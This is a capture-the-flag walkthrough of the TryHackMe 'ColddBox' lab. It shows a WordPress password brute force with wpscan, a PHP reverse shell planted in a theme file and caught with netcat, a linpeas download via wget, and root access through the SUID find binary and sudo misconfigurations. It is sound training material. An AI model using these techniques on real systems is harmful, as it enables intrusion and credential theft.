TryHackMe: ColddBox Walkthrough

THM Easy room image of ColddBox

Play

1. Scanning & Enumeration

We do the below scans in parallel.

1.1. Port Scanning

Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.1.31
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: ColddBox | One more machine

Nothing interesting. Only port 80 open, no ssh.

Not shown: 65530 closed ports
PORT STATE SERVICE
80/tcp open http
4512/tcp open unknown
8584/tcp filtered unknown
43286/tcp filtered unknown
59766/tcp filtered unknown

Again, these don’t look like they are expected. We may check 4512 later.+

1.2. Web Enumeration

┌──(kali㉿kali)-[~]
└─$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x 'php,html,txt' -t 32 -q -u 10.10.141.86
/index.php (Status: 301) [Size: 0] [--> http://10.10.141.86/]
/wp-content (Status: 301) [Size: 317] [--> http://10.10.141.86/wp-content/]
/wp-login.php (Status: 200) [Size: 2547]
/license.txt (Status: 200) [Size: 19930]
/wp-includes (Status: 301) [Size: 318] [--> http://10.10.141.86/wp-includes/]
/readme.html (Status: 200) [Size: 7173]
/wp-trackback.php (Status: 200) [Size: 135]
/wp-admin (Status: 301) [Size: 315] [--> http://10.10.141.86/wp-admin/]
/hidden (Status: 301) [Size: 313] [--> http://10.10.141.86/hidden/]
/xmlrpc.php (Status: 200) [Size: 42]

Note the /hidden/ directory. Rest everything looks standard.

I tried exploring the wp-trackback, but it looked like a dead end.

1.3. Web Exploration

homepage of coldbox website

The author is mentioned as:

Author: the cold in person

author shown in the colddbox website posts

This username is incorrect, as shown by the WordPress error message.

the author name is invalid in the WordPress login page

1.4. Hidden Directory

We find a hidden directory in the gobsuter scan.

urgent message displayed on the hidden directory page. This gives us usernames for wordpress

We thus get a list of the usernames:

  • C0ldd
  • Hugo
  • Philip Trying them out gives the same error message for all of them. This means we can brute-force!
Trying out the usernames found/

1.5. Brute-Force

We use the wpscan tool.

wpscan --url http://10.10.141.86/ -U c0ldd,philip,hugo -P /usr/share/wordlists/rockyou.txt --password-attack wp-login -t 32 ->

  • –url: specifies the url
  • -U: specifies the userlist
  • -P: specifies the passwordlist
  • -t: threads
  • –password-attack: self explanatory

Wait patiently, this scan took me 12+ minutes. We thus get: [SUCCESS] - c0ldd / {the author yeeted this}

WordPress dashboard admin view.

2. Foothold

To get a foothold, I usually edit the 404.php page. It can be found in: Appearance -> editor -> 404.php

PHP reverse shell in WordPress 404.php page

I put the phprevshell. This can be taken from github here

  1. Start a listener on selected port. Listen using nc -lnvp PORT_NUMBER_HERE.
  2. Go to: http://10.10.141.86/?p=2 (only post=1 exists)
┌──(kali㉿kali)-[~/Desktop/tools/files]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.17.8.184] from (UNKNOWN) [10.10.141.86] 54404
Linux ColddBox-Easy 4.4.0-186-generic #216-Ubuntu SMP Wed Jul 1 05:34:05 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
06:14:23 up 45 min, 0 users, load average: 0.30, 12.10, 16.15
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@ColddBox-Easy:/$

We are in!

3. PrivEsc

I transferred the linpeas.sh file, which you can take from here.

Start a python server on your machine, using sudo python3 -m http.server 80 and on the target machine, wget YOUR_IP_ADDRESS/linpeas.sh. Make sure that you are in a directory with write permisssions. One really good place is /tmp direcotry. Execute the file using bash linpeas.sh

The following was marked as potential PE vectors.

[+] Operative system                                                                       
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#kernel-exploits
Linux version 4.4.0-186-generic (buildd@lcy01-amd64-002) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.12) ) #216-Ubuntu SMP Wed Jul 1 05:34:05 UTC 2020
Distributor ID: Ubuntu
Description: Ubuntu 16.04.7 LTS
Release: 16.04
Codename: xenial

Looks like an old kernel version.

[+] Sudo version
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version
Sudo version 1.8.16

This exploit only works in certain conditions:

  • you know sudo password of any user
  • the permissions look something like: (ALL, !root) /usr/bin/id.
[+] SUID - Check easy privesc, exploits and write perms                                    
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
-rwsr-xr-x 1 root root 44K May 7 2014 /bin/ping6
-rwsr-xr-x 1 root root 44K May 7 2014 /bin/ping
-rwsr-sr-x 1 daemon daemon 51K Jan 14 2016 /usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614)
-rwsr-xr-x 1 root root 217K Feb 8 2016 /usr/bin/find

/usr/bin/find marked. We can also find other files with the set-uid bit. Look at the following.

www-data@ColddBox-Easy:/tmp$ find / -type f -perm -u=s 2> /dev/null
find / -type f -perm -u=s 2> /dev/null
/bin/su
/bin/ping6
/bin/ping
/bin/fusermount
/bin/umount
/bin/mount
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/pkexec
/usr/bin/find
/usr/bin/sudo
/usr/bin/newgidmap
/usr/bin/newgrp
/usr/bin/at
/usr/bin/newuidmap
/usr/bin/chfn
/usr/bin/passwd
/usr/lib/openssh/ssh-keysign
/usr/lib/snapd/snap-confine
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper

3.1. SUID Bit: Find Binary

Using GTFOBins — Find SUID.

www-data@ColddBox-Easy:/tmp$ find . -exec /bin/sh -p \; -quit
find . -exec /bin/sh -p \; -quit
# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)

With this, we can view both the user and root flags in the /home/c0ldd and the /root directory.

3.2. Exploration + SUDO: 3 Paths

Note how we have the user c0ldd. Could we try and getting some credentials? From other machines, I know wp-config.php is a juicy file. Exploring that,

www-data@ColddBox-Easy:/var/www/html$ cat wp-config.php
cat wp-config.php
<?php
/**
* The base configurations of the WordPress.
*
* This file has the following configurations: MySQL settings, Table Prefix,
* Secret Keys, and ABSPATH. You can find more information by visiting
* {@link http://codex.wordpress.org/Editing_wp-config.php Editing wp-config.php}
* Codex page. You can get the MySQL settings from your web host.
*
* This file is used by the wp-config.php creation script during the
* installation. You don't have to use the web site, you can just copy this file
* to "wp-config.php" and fill in the values.
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'colddbox');
/** MySQL database username */
define('DB_USER', 'c0ldd');
/** MySQL database password */
define('DB_PASSWORD', '{i ate this, was too tasty}');
/** MySQL hostname */
define('DB_HOST', 'localhost');
{truncated}define('WP_HOME', '/');
define('WP_SITEURL', '/');
/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');

We have credentials for c0ldd!

www-data@ColddBox-Easy:/var/www/html$ su c0ldd
su c0ldd
Password: {i hid this :P}
c0ldd@ColddBox-Easy:/var/www/html$ cd ~
cd ~
c0ldd@ColddBox-Easy:~$ sudo -l
sudo -l
[sudo] password for c0ldd: {yes I ate this too. Don't judge me ok}
Coincidiendo entradas por defecto para c0ldd en ColddBox-Easy:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
El usuario c0ldd puede ejecutar los siguientes comandos en ColddBox-Easy:
(root) /usr/bin/vim
(root) /bin/chmod
(root) /usr/bin/ftp

We see that we are allowed to run the 3 files as sudo. We use the following respectively for each of the binaries.

  1. GTFOBins — vim SUDO
  2. GTFOBins — chmod SUDO
  3. GTFOBins — ftp SUDO

This completes our room. System FULLY compromised!

Originally published at https://chaudhary1337.github.io.

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store